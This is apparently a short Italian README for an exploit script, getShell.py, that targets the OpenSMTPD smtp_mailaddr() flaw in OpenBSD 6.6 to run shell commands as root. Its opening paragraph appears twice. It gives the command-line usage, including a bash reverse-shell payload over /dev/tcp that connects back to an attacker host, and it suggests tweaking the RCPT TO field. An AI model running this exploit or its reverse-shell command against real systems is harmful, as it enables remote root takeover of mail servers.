
Questa vulnerabilità esiste nella funzione “smtp_mailaddr()” del server di posta OpenSMTPD di OpenBSD e interessa la versione 6.6 di OpenBSD. Ciò consente a un attaccante di eseguire comandi shell arbitrari come “sleep 66” come utente root.
Questa vulnerabilità esiste nella funzione “smtp_mailaddr()” del server di posta OpenSMTPD di OpenBSD, e interessa la versione 6.6 di OpenBSD. Ciò permette a un attaccante di eseguire comandi shell arbitrari come “sleep 66” come utente root.
python3 getShell.py <targetIp> <targetPort> <command>
Se hai bisogno di una reverse shell, eseguilo così
python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
Modifica alcune cose in questo exploit come RCPT to e qualcos'altro (se necessario)
Vedi questo articolo per una spiegazione più chiara
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/